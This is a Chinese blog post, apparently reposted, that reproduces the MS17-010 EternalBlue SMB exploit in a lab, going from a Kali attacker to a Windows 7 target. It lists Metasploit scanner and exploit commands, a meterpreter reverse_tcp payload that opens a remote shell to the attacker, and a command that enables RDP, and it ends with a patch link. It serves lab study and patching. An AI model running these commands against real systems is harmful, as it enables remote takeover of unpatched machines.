当前位置: 代码迷 >> 综合 >> Metasploit-MS17-010(永恒之蓝 EternalBlue )复现
  详细解决方案

Metasploit-MS17-010(永恒之蓝 EternalBlue )复现

热度:69   发布时间:2023-12-24 06:09:44.0

一. 概述

此安全更新程序修复了 Microsoft Windows 中的多个漏洞。如果攻击者向 Windows SMBv1 服务器发送特殊设计的消息,那么其中最严重的漏洞可能允许远程执行代码。

对于 Microsoft Windows 的所有受支持版本,此安全更新的等级为“严重”。有关详细信息,请参阅受影响的软件和漏洞严重等级部分。

此安全更新可通过更正 SMBv1 处理经特殊设计的请求的方式来修复这些漏洞。

有关这些漏洞的详细信息,请参阅漏洞信息部分。

EternalChampion 永恒冠军(CVE-2017-0146 & CVE-2017-0147)
EternalRomance 永恒浪漫(MS17_010)
Eternal Synergy永恒协作(CVE-2017-0143)
EternalBlue 永恒之蓝(MS17_010)

在这里插入图片描述
详情请查阅下方微软官方文档

概览
中文名:永恒之蓝
微软官方编号:MS17-010
CVE编号:CVE-2017-0143
类型:远程代码执行
官方评级:严重
影响系统:win7,winserver08,winserver08r2,win8.1,winserver12,winserver12r2,win10,winserver16

二. 复现

攻击机 靶机
IP:192.168.199.130 192.168.199.209
OS:kali-linux win7

ms17-010用的smb445端口
在这里插入图片描述

$ use auxiliary/scanner/smb/smb_ms17_010	//扫描模块
$ set rhosts 192.168.199.209
$ exploit

在这里插入图片描述

$ use exploit/windows/smb/ms17_010_eternalblue	//攻击模块
$ set payload windows/x64/meterpreter/reverse_tcp
$ set lhost 192.168.199.130
$ set rhosts 192.168.199.209
$ run getgui -e	//打开3389端口

在这里插入图片描述

在这里插入图片描述

靶机3389端口打开

在这里插入图片描述

$ rdesktop 192.168.199.209

在这里插入图片描述

三. 补丁

https://support.microsoft.com/zh-cn/help/4012598/title
在这里插入图片描述